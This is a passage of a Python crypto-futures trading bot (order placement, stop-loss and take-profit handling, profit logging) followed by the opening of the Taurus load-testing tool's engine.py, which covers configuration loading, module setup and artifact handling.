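#   SM_stopPrice = 350.00 * (1 - 0.05 / 10)            = 348.25
# i.e. both the target profit and the stop loss are scaled down by the leverage so the
# thresholds are expressed on price rather than on margin.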
quantity =round((first_order.avgPrice*first_order.lastFilledQty),3)
# Take profit order
self.client.futures_create_order(symbol = self.__paried_symbol,
side=(OrderSide.BUY if positionSide.lower() == "short" else OrderSide.SELL),
type=OrderType.TAKE_PROFIT,
positionSide=positionSide.upper(),
# closePosition=True,
quantity =quantity,
stopPrice = TP_stopPrice,
price = TP_stopPrice,
newClientOrderId= prefix_id + OrderSide.SELL + "_" + positionSide + "_TP",
)
# Stop loss order
self.client.futures_create_order(symbol = self.__paried_symbol,
side=(OrderSide.BUY if positionSide.lower() == "short" else OrderSide.SELL),
type=OrderType.STOP_MARKET,
positionSide=positionSide.upper(),
closePosition=True,
quantity =quantity,
stopPrice = SM_stopPrice,
newClientOrderId= prefix_id + OrderSide.SELL + "_" + positionSide + "_SM",
)
else:
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
elif ((positionSide == 'long' and orderPosition == 'sell') or (positionSide == 'short' and orderPosition == 'buy')):
self.current_position_dict[prefix_id]['comission'] += (0 if first_order.commissionAmount == None else first_order.commissionAmount)
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
if orderStatus == 'FILLED'.lower():
TP = clientOrderId[:-2] + "TP"
SM = clientOrderId[:-2] + "SM"
clientOrderID_not_filled = TP if clientOrderId[-2:] == "SM" else SM
originalSpend = self.current_position_dict[prefix_id]['entryPrice'] * self.current_position_dict[prefix_id]['quantity']
TP_quantity = self.current_position_dict[prefix_id]['relatedOrderID'][TP].cumulativeFilledQty
TP_average_price = self.current_position_dict[prefix_id]['relatedOrderID'][TP].avgPrice
TP_total = TP_quantity * TP_average_price
SM_quantity = self.current_position_dict[prefix_id]['relatedOrderID'][SM].cumulativeFilledQty
SM_average_price = self.current_position_dict[prefix_id]['relatedOrderID'][SM].avgPrice
SM_total = SM_quantity * SM_average_price
# positionSide was lowered above; for a short the entry is a sell (originalSpend is
# received) and the exits are buys, for a long it is the other way round.
if positionSide == 'short':
profit = ( originalSpend - (TP_total + SM_total) - self.current_position_dict[prefix_id]['comission'])
else:
profit = ( (TP_total + SM_total) - originalSpend - self.current_position_dict[prefix_id]['comission'])
self.__starting_asset_value += profit
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderID_not_filled, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happened while cancelling the order: {}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientOrderID_not_filled,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
log_string = '\n\n{}\nPNL for this order:\nclientOrderId: {}\npositionSide: {}\nentryPrice: {}\nexitPrice: {}\nTakeProfitAmount: {}\n TakeProfitQuantity: {}\n TakeProfitPrice: {}\nStopLossAmount: {}\n StopLossQuantity: {}\n StopLossPrice: {}\nCommission: {}\nProfit: {}\nStart Datetime: {}\nFinished Datetime: {}\n{}'.format(self.margin,
prefix_id,
positionSide.upper(),
self.current_position_dict[prefix_id]['entryPrice'],
((TP_total + SM_total)/(TP_quantity + SM_quantity)),
TP_total, TP_quantity, TP_average_price,
SM_total, SM_quantity, SM_average_price,
self.current_position_dict[prefix_id]['comission'],
profit,
utc_2_datetime(int(prefix_id)/1000),
current_date_time(),
self.margin)
put_to_log(log_string, self.__profit_log_path)
print(log_string)
del self.current_position_dict[prefix_id]
else:
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
else:
print("\n====================================================================\nReceived a user order:")
PrintMix.print_data(first_order)
put_to_log('\n\nUser order:\n{}\n'.format(convert_object_to_string(first_order)), self.__order_log_path)
print("====================================================================\n")
except Exception as e:
log = "\n\n{}\nAn ERROR happened in position handler function: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def position_status_handler(self):
'''
NEW
PARTIALLY_FILLED (partially filled)
FILLED (filled)
CANCELED (canceled)
CALCULATED
EXPIRED (order expired)
TRADE (trade)
'''
while True:
try:
current_order_status = None if self.position_status.order_status == None else self.position_status.order_status.upper()
if (current_order_status == 'FILLED'):
time.sleep(0.05)
if ((self.position_status.position_object.amount == 0) and ((current_order_status =='FILLED'))):
# Position finished successfully, reset
self.position_status = positionStatus(self.__paried_symbol)
print('Position finished!:\nPosition status reset!')
elif ((self.position_status.position_object.amount != 0) and ((current_order_status =='FILLED'))):
# Order finished successfully, reset order, handle/monitor position
pass
elif (current_order_status == 'CANCELED'):
time.sleep(0.05)
if ((self.position_status.position_object.amount== 0) and ((current_order_status =='CANCELED'))):
# Position finished unexpectedly, reset
self.position_status = positionStatus(self.__paried_symbol)
print('Order was canceled, but position finished: \nPosition status reset!\n')
elif ((self.position_status.position_object.amount != 0) and ((current_order_status =='CANCELED'))):
# Order canceled, handle/monitor position
pass
elif (current_order_status == 'NEW'):
time.sleep(0.05)
if ((self.position_status.position_object.amount == 0) and ((current_order_status =='NEW'))):
# Order waiting to be filled to position
pass
elif ((self.position_status.position_object.amount != 0) and ((current_order_status =='NEW'))):
# Order created, handle/monitor position
print("Order is created to handle the corresponding position!")
elif (current_order_status == 'EXPIRED'):
time.sleep(0.05)
if ((self.position_status.position_object.amount == 0) and ((current_order_status =='EXPIRED'))):
# Position finished unexpectedly, reset
pass
elif ((self.position_status.position_object.amount != 0) and ((current_order_status =='EXPIRED'))):
# Order finished successfully, reset order, handle/monitor position
pass
elif ((current_order_status == None) and (self.position_status.position_object.amount == 0)):
#analyzing
time.sleep(1)
# print('This is not finished yet!', self.kline_info['kline_list']['close_price_list'][-4:])
pass
elif (current_order_status == 'PARTIALLY_FILLED'):
pass
elif (current_order_status == 'CALCULATED'):
pass
elif (current_order_status == 'TRADE'):
pass
# else:
# raise Exception("\nUnknown error happened while handling position: invalid position status: {}".format(self.position_status.order_status))
except Exception as e:
log = "\n\n{}\nAn ERROR happened while handling position status: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def order_handler(self):
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': 0,
'level': 0,
'price': None
}
}
self.current_position_dict = {
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
'comission': 999
}
}
'''
while True:
try:
for clientID in list(self.current_position_dict.keys()):  # copy keys: entries may be deleted inside the loop
clientOrderID = clientID + OrderSide.BUY + "_" + self.current_position_dict[clientID]['positionSide']
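# The first 13 characters of the client id are the creation timestamp in milliseconds
# (see place_limit_buy, where uniqueOrderId is derived from current_utc_time()), so the
# check below cancels entry orders that are still unfilled (entryPrice is None) after
# self.__order_timeout milliseconds.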
if ( ( ( int(time.time())*1000 - int(clientID[:13] ) ) > self.__order_timeout) and ( self.current_position_dict[clientID]['entryPrice'] == None ) ):
result = None
try:
result = self.client.futures_cancel_order(origClientOrderId = clientOrderID, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happened while cancelling the timeout order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
if result!= None:
if result.status.upper() == 'CANCELED':
del self.current_position_dict[clientID]
else:
raise Exception("\n\nTimeout order: {} was not successfully canceled.".format(clientID))
if ( ( ( self.__acc_profit + self.__starting_asset_value) < 8) and ( len(self.current_position_dict) == 0 ) ):
print('\n\nNot enough balance: {}\n\n'.format( self.__acc_profit + self.__starting_asset_value))
time.sleep(3)
if len(self.current_position_dict) <2:
recom = self.current_recommendation.copy()
if len(self.current_position_dict) == 1:
pass
# # Uncomment the following if both long and short can exist
# current_position_clientOrderId = list(self.current_position_dict.keys())[0]
# current_position_side = self.current_position_dict[current_position_clientOrderId]['positionSide']
# opoPositionSide = PositionSide.SHORT if current_position_side.upper() == PositionSide.LONG else PositionSide.LONG
# if recom[opoPositionSide.lower()]['level'] > 0:
# rec_price = recom[opoPositionSide.lower()]['price']
# quantity =round((1/rec_price*(self.__starting_asset_value*self.__leverage)),3)
# positionSide = opoPositionSide.lower()
# level = recom[opoPositionSide.lower()]['level']
# uniqueOrderId = str(int(current_utc_time())*1000)
# self.place_limit_buy(positionSide, level, quantity, rec_price, uniqueOrderId)
# time.sleep(0.2)
elif len(self.current_position_dict) == 0:
if (recom['short']['level'] > 0 or recom['long']['level'] > 0):
if recom['short']['level'] > 0:
posisionSide = 'short'
elif recom['long']['level'] > 0:
posisionSide = 'long'
if (posisionSide == 'long' or posisionSide == 'short'):
rec_price = recom[posisionSide.lower()]['price']
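# Position sizing on the next line: quantity = (starting asset value * leverage) / price.
# With hypothetical numbers (starting asset value 100 USDT, leverage 10, recommended
# price 350.00): quantity = 100 * 10 / 350.00 = 2.857.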
quantity =round((1/rec_price*(self.__starting_asset_value*self.__leverage)),3)
level = recom[posisionSide.lower()]['level']
uniqueOrderId = str(int(current_utc_time())*1000)
self.place_limit_buy(posisionSide, level, quantity, rec_price, uniqueOrderId)
except Exception as e:
log = "\n\n{}\nAn ERROR happened while handling an order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def place_limit_buy(self, positionSide, level, quantity, price, uniqueOrderId):
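# Note on the limit price below: the triggering price is nudged by roughly 0.03%
# (x1.0003 for longs, x0.9997 for shorts) so the order sits slightly on the aggressive
# side and is more likely to fill quickly. With a hypothetical trigger price of 350.00,
# a long order would be placed at about 350.00 * 1.0003 = 350.105 (rounded to 2 decimals).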
try:
self.client.futures_create_order(symbol = self.__paried_symbol,
side=(OrderSide.BUY if positionSide.lower() == "long" else OrderSide.SELL),
type=OrderType.LIMIT,
positionSide=positionSide.upper(),
timeInForce = TimeInForce.GTC,
quantity =quantity,
price = round((price * (1.0003 if positionSide.lower() == "long" else 0.9997)), 2),
newClientOrderId=uniqueOrderId + OrderSide.BUY + "_" + positionSide
)
except Exception as e:
log = "\n\n{}\nAn ERROR happened while placing a limit order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
self.current_position_dict[uniqueOrderId] = {
'uniqueOrderId': uniqueOrderId,
'level': level,
'positionSide': positionSide,
'trigeredPrice': price,
'entryPrice': None,
'exitPrice': None,
'quantity': 0,
'relatedOrderID': {},
'comission': 0
}
def cancele_order(self, clientOrderId):
pass
def run(self):
'''
https://www.itranslater.com/qa/details/2583623258847314944
'''
pre_task_finished = self.make_dir()
if pre_task_finished:
self.update_config_info()
t1 = threading.Thread(target=self.start_subscribing)
t2 = threading.Thread(target=self.start_analysing)
t3 = threading.Thread(target=self.start_handler)
t4 = threading.Thread(target=self.check_if_service_avaliable)
task_list = [t1, t2, t3, t4]
for task in task_list:
task.start()
for task in task_list:
task.join()
|
engine.py
|
"""
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import hashlib
import json
import logging
import math
import os
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from abc import abstractmethod
from collections import namedtuple, defaultdict
from distutils.version import LooseVersion
from json import encoder
import yaml
from yaml.representer import SafeRepresenter
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException, InvalidTaurusConfiguration
from bzt.requests_model import RequestParser
from bzt.six import numeric_types
from bzt.six import string_types, text_type, PY2, UserDict, parse, reraise
from bzt.utils import PIPE, shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient
from bzt.utils import load_class, to_json, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import str_representer, Environment, RequiredTool, RESOURCES_DIR
TAURUS_ARTIFACTS_DIR = "TAURUS_ARTIFACTS_DIR"
SETTINGS = "settings"
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log, dict(os.environ))
self.shared_env = Environment(self.log)
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self._http_client = None
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": bzt.VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def _generate_id(self):
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare the engine for work: call prepare() on Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, cwd, stdout, stderr, stdin, shell, env):
if cwd is None:
cwd = self.default_cwd
env = Environment(self.log, env.get())
env.set(self.shared_env.get())
return shell_exec(args, cwd=cwd, stdout=stdout, stderr=stderr, stdin=stdin, shell=shell, env=env.get())
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
self.stopping_reason = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_info:
exc_info = sys.exc_info()
if not exc_value:
exc_value = exc
if exc_info:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait for modules to finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not exc_info:
exc_info = sys.exc_info()
if not exc_value:
exc_value = exc
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_info:
exc_info = sys.exc_info()
if not exc_value:
exc_value = exc
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
self.log.debug("New artifact filename: %s", filename)
return filename
def existing_artifact(self, filename, move=False, target_filename=None):
"""
Add an existing artifact; it will be collected into the artifacts dir. If
move=True, the original file will be deleted
:type filename: str
:type move: bool
:type target_filename: str
"""
self.log.debug("Add existing artifact (move=%s): %s", move, filename)
if self.artifacts_dir is None:
self.log.warning("Artifacts dir has not been set, will not copy %s", filename)
return
new_filename = os.path.basename(filename) if target_filename is None else target_filename
new_name = os.path.join(self.artifacts_dir, new_filename)
self.__artifacts.append(new_name)
if get_full_path(filename) == get_full_path(new_name):
self.log.debug("No need to copy %s", filename)
return
if not os.path.exists(filename):
self.log.warning("Artifact file does not exist: %s", filename)
return
if move:
self.log.debug("Moving %s to %s", filename, new_name)
shutil.move(filename, new_name)
else:
self.log.debug("Copying %s to %s", filename, new_name)
shutil.copy(filename, new_name)
def create_artifacts_dir(self, existing_artifacts=(), merged_config=None):
"""
Create directory for artifacts, directory name based on datetime.now()
"""
if not self.artifacts_dir:
artifacts_dir = self.config.get(SETTINGS, force_set=True).get("artifacts-dir", self.ARTIFACTS_DIR)
self.artifacts_dir = datetime.datetime.now().strftime(artifacts_dir)
self.artifacts_dir = get_full_path(self.artifacts_dir)
self.log.info("Artifacts dir: %s", self.artifacts_dir)
self.env.set({TAURUS_ARTIFACTS_DIR: self.artifacts_dir})
os.environ[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
if not os.path.isdir(self.artifacts_dir):
os.makedirs(self.artifacts_dir)
# dump current effective configuration
dump = self.create_artifact("effective", "") # TODO: not ideal, since this file does not exist yet
self.config.set_dump_file(dump)
self.config.dump()
# dump merged configuration
if merged_config:
merged_config.dump(self.create_artifact("merged", ".yml"), Configuration.YAML)
merged_config.dump(self.create_artifact("merged", ".json"), Configuration.JSON)
for artifact in existing_artifacts:
self.existing_artifact(artifact)
def is_functional_mode(self):
return self.aggregator is not None and self.aggregator.is_functional
def __load_module(self, alias):
"""
Load module class by alias
:param alias: str
:return: class
"""
if alias in self.modules:
return self.modules[alias]
mod_conf = self.config.get('modules')
if alias not in mod_conf:
msg = "Module '%s' not found in list of available aliases %s" % (alias, sorted(mod_conf.keys()))
raise TaurusConfigError(msg)
settings = ensure_is_dict(mod_conf, alias, "class")
acopy = copy.deepcopy(settings)
BetterDict.traverse(acopy, Configuration.masq_sensitive)
self.log.debug("Module config: %s %s", alias, acopy)
err = TaurusConfigError("Class name for alias '%s' is not found in module settings: %s" % (alias, settings))
clsname = settings.get('class', err)
self.modules[alias] = load_class(clsname)
if not issubclass(self.modules[alias], EngineModule):
raise TaurusInternalException("Module class does not inherit from EngineModule: %s" % clsname)
return self.modules[alias]
def instantiate_module(self, alias):
"""
Create new instance for module using its alias from module settings
section of config. Thus, to instantiate module it should be mentioned
in settings.
:type alias: str
:rtype: EngineModule
"""
classobj = self.__load_module(alias)
instance = classobj()
assert isinstance(instance, EngineModule)
instance.log = self.log.getChild(alias)
instance.engine = self
settings = self.config.get("modules")
instance.settings = settings.get(alias)
return instance
def find_file(self, filename):
"""
Try to find file or dir in search_path if it was specified. Helps finding files
in non-CLI environments or relative to config path
The returned path is absolute and must not be post-processed with abspath etc.
:param filename: file basename to find
:type filename: str
"""
if not filename:
return filename
if filename.lower().startswith("http://") or filename.lower().startswith("https://"):
parsed_url = parse.urlparse(filename)
downloader = ExceptionalDownloader(self.get_http_client())
self.log.info("Downloading %s", filename)
tmp_f_name, headers = downloader.get(filename)
cd_header = headers.get('Content-Disposition', '')
dest = cd_header.split('filename=')[-1] if cd_header and 'filename=' in cd_header else ''
if dest.startswith('"') and dest.endswith('"') or dest.startswith("'") and dest.endswith("'"):
dest = dest[1:-1]
elif not dest:
dest = os.path.basename(parsed_url.path)
fname, ext = os.path.splitext(dest) if dest else (parsed_url.hostname.replace(".", "_"), '.file')
dest = self.create_artifact(fname, ext)
self.log.debug("Moving %s to %s", tmp_f_name, dest)
shutil.move(tmp_f_name, dest)
return dest
else:
filename = os.path.expanduser(filename) # expanding of '~' is required for check of existence
# check filename 'as is' and all combinations of file_search_path/filename
for dirname in [""] + self.file_search_paths:
location = os.path.join(dirname, filename)
if os.path.exists(location):
if dirname:
self.log.warning("Guessed location from search paths for %s: %s", filename, location)
return get_full_path(location)
self.log.warning("Could not find location at path: %s", filename)
return filename
def _load_base_configs(self):
base_configs = [os.path.join(RESOURCES_DIR, 'base-config.yml')]
machine_dir = get_configs_dir() # can't refactor machine_dir out - see setup.py
if os.path.isdir(machine_dir):
self.log.debug("Reading extension configs from: %s", machine_dir)
for cfile in sorted(os.listdir(machine_dir)):
fname = os.path.join(machine_dir, cfile)
if os.path.isfile(fname):
base_configs.append(fname)
else:
self.log.debug("No machine configs dir: %s", machine_dir)
self.log.debug("Base configs list: %s", base_configs)
self.config.load(base_configs)
def _load_user_configs(self, user_configs):
"""
:type user_configs: list[str]
:rtype: Configuration
"""
# "tab-replacement-spaces" is not documented 'cause it loads only from base configs
# so it's sort of half-working last resort
self.config.tab_replacement_spaces = self.config.get(SETTINGS).get("tab-replacement-spaces", 4)
self.log.debug("User configs list: %s", user_configs)
self.config.load(user_configs)
user_config = Configuration()
user_config.log = self.log.getChild(Configuration.__name__)
user_config.tab_replacement_spaces = self.config.tab_replacement_spaces
user_config.warn_on_tab_replacement = False
user_config.load(user_configs, self.__config_loaded)
return user_config
def __config_loaded(self, config):
self.file_search_paths.append(get_full_path(config, step_up=1))
def __prepare_provisioning(self):
"""
Instantiate provisioning class
"""
err = TaurusConfigError("Please check global config availability or configure provisioning settings")
cls = self.config.get(Provisioning.PROV, err)
self.provisioning = self.instantiate_module(cls)
self.prepared.append(self.provisioning)
self.provisioning.prepare()
def __prepare_reporters(self):
"""
Instantiate reporters, then prepare them in case they would like to interact
"""
reporting = self.config.get(Reporter.REP, [])
for index, reporter in enumerate(reporting):
reporter = ensure_is_dict(reporting, index, "module")
msg = "reporter 'module' field isn't recognized: %s"
cls = reporter.get('module', TaurusConfigError(msg % reporter))
instance = self.instantiate_module(cls)
instance.parameters = reporter
if self.__singletone_exists(instance, self.reporters):
continue
assert isinstance(instance, Reporter)
self.reporters.append(instance)
for reporter in self.reporters[:]:
if not reporter.should_run():
self.reporters.remove(reporter)
# prepare reporters
for module in self.reporters:
self.prepared.append(module)
module.prepare()
def __prepare_services(self):
"""
Instantiate service modules, then prepare them
"""
srv_config = self.config.get(Service.SERV, [])
services = []
for index, config in enumerate(srv_config):
config = ensure_is_dict(srv_config, index, "module")
cls = config.get('module', '')
instance = self.instantiate_module(cls)
instance.parameters = config
if self.__singletone_exists(instance, services):
continue
assert isinstance(instance, Service)
services.append(instance)
for service in services[:]:
if not service.should_run():
services.remove(service)
self.services.extend(services)
for module in self.services:
self.prepared.append(module)
module.prepare()
def __singletone_exists(self, instance, mods_list):
"""
:type instance: EngineModule
:type mods_list: list[EngineModule]
:rtype: bool
"""
if not isinstance(instance, Singletone):
return False
for mod in mods_list:
if mod.parameters.get("module") == instance.parameters.get("module"):
msg = "Module '%s' can only be used once, will merge all new instances into a single one"
self.log.warning(msg % mod.parameters.get("module"))
mod.parameters.merge(instance.parameters)
return True
def __prepare_aggregator(self):
"""
Instantiate aggregators
:return:
"""
cls = self.config.get(SETTINGS).get("aggregator", "")
if not cls:
self.log.warning("Proceeding without aggregator, no results analysis")
else:
self.aggregator = self.instantiate_module(cls)
self.prepared.append(self.aggregator)
self.aggregator.prepare()
def get_http_client(self):
if self._http_client is None:
self._http_client = HTTPClient()
self._http_client.add_proxy_settings(self.config.get("settings").get("proxy"))
return self._http_client
def _check_updates(self, install_id):
try:
params = (bzt.VERSION, install_id)
addr = "http://gettaurus.org/updates/?version=%s&installID=%s" % params
self.log.debug("Requesting updates info: %s", addr)
client = self.get_http_client()
response = client.request('GET', addr, timeout=10)
data = response.json()
self.log.debug("Taurus updates info: %s", data)
mine = LooseVersion(bzt.VERSION)
latest = LooseVersion(data['latest'])
if mine < latest or data['needsUpgrade']:
msg = "There is newer version of Taurus %s available, consider upgrading. " \
"What's new: http://gettaurus.org/docs/Changelog/"
self.log.warning(msg, latest)
else:
self.log.debug("Installation is up-to-date")
except BaseException:
self.log.debug("Failed to check for updates: %s", traceback.format_exc())
self.log.warning("Failed to check for updates")
def eval_env(self):
"""
Should be done after `configure`
"""
envs = self.config.get(SETTINGS, force_set=True).get("env", force_set=True)
envs[TAURUS_ARTIFACTS_DIR] = self.artifacts_dir
for varname in envs:
if envs[varname]:
envs[varname] = str(envs[varname])
envs[varname] = os.path.expandvars(envs[varname])
for varname in envs:
self.env.set({varname: envs[varname]})
if envs[varname] is None:
if varname in os.environ:
os.environ.pop(varname)
else:
os.environ[varname] = str(envs[varname])
def custom_expandvars(value):
parts = re.split(r'(\$\{.*?\})', value)
value = ''
for item in parts:
if item and item.startswith("${") and item.endswith("}"):
key = item[2:-1]
if key in envs:
item = envs[key]
if item is not None:
value += text_type(item)
return value
def apply_env(value, key, container):
if isinstance(value, string_types):
container[key] = custom_expandvars(value)
BetterDict.traverse(self.config, apply_env)
class Configuration(BetterDict):
"""
Loads and merges both JSON and YAML configs, plus .properties-like overrides,
and dumps the effective config into files.
The first config should not contain action prefixes.
"""
JSON = "JSON"
YAML = "YAML"
def __init__(self, *args, **kwargs):
super(Configuration, self).__init__(*args, **kwargs)
self.log = logging.getLogger('')
self.dump_filename = None
self.tab_replacement_spaces = 0
self.warn_on_tab_replacement = True
def load(self, config_files, callback=None):
"""
Load and merge JSON/YAML files into current dict
:type callback: callable
:type config_files: list[str]
"""
self.log.debug("Configs: %s", config_files)
for config_file in config_files:
try:
configs = []
with codecs.open(config_file, 'r', encoding='utf-8') as fds:
if self.tab_replacement_spaces:
contents = self._replace_tabs(fds.readlines(), config_file)
else:
contents = fds.read()
self._read_yaml_or_json(config_file, configs, contents)
for config in configs:
self.merge(config)
except KeyboardInterrupt:
raise
except InvalidTaurusConfiguration:
raise
except BaseException as exc:
raise TaurusConfigError("Error when reading config file '%s': %s" % (config_file, exc))
if callback is not None:
callback(config_file)
def _read_yaml_or_json(self, config_file, configs, contents):
try:
self.log.debug("Reading %s as YAML", config_file)
yaml_documents = list(yaml.load_all(contents))
for doc in yaml_documents:
if doc is None:
continue
if not isinstance(doc, dict):
raise InvalidTaurusConfiguration("Configuration %s is invalid" % config_file)
configs.append(doc)
except KeyboardInterrupt:
raise
except BaseException as yaml_load_exc:
self.log.debug("Cannot read config file as YAML '%s': %s", config_file, yaml_load_exc)
if contents.lstrip().startswith('{'):
self.log.debug("Reading %s as JSON", config_file)
config_value = json.loads(contents)
if not isinstance(config_value, dict):
raise InvalidTaurusConfiguration("Configuration %s is invalid" % config_file)
configs.append(config_value)
else:
raise
def set_dump_file(self, filename):
"""
Set default file and format to be used by `dump` method
:type filename: str
"""
self.dump_filename = filename
def write(self, fds, fmt):
"""
Write config into opened file
:type fds: file
:type fmt: str
:raise TaurusInternalException:
"""
if fmt == self.JSON:
json_s = to_json(self)
fds.write(json_s.encode('utf-8'))
elif fmt == self.YAML:
yml = yaml.dump(self, default_flow_style=False, explicit_start=True, canonical=False, allow_unicode=True,
encoding='utf-8', width=float("inf"))
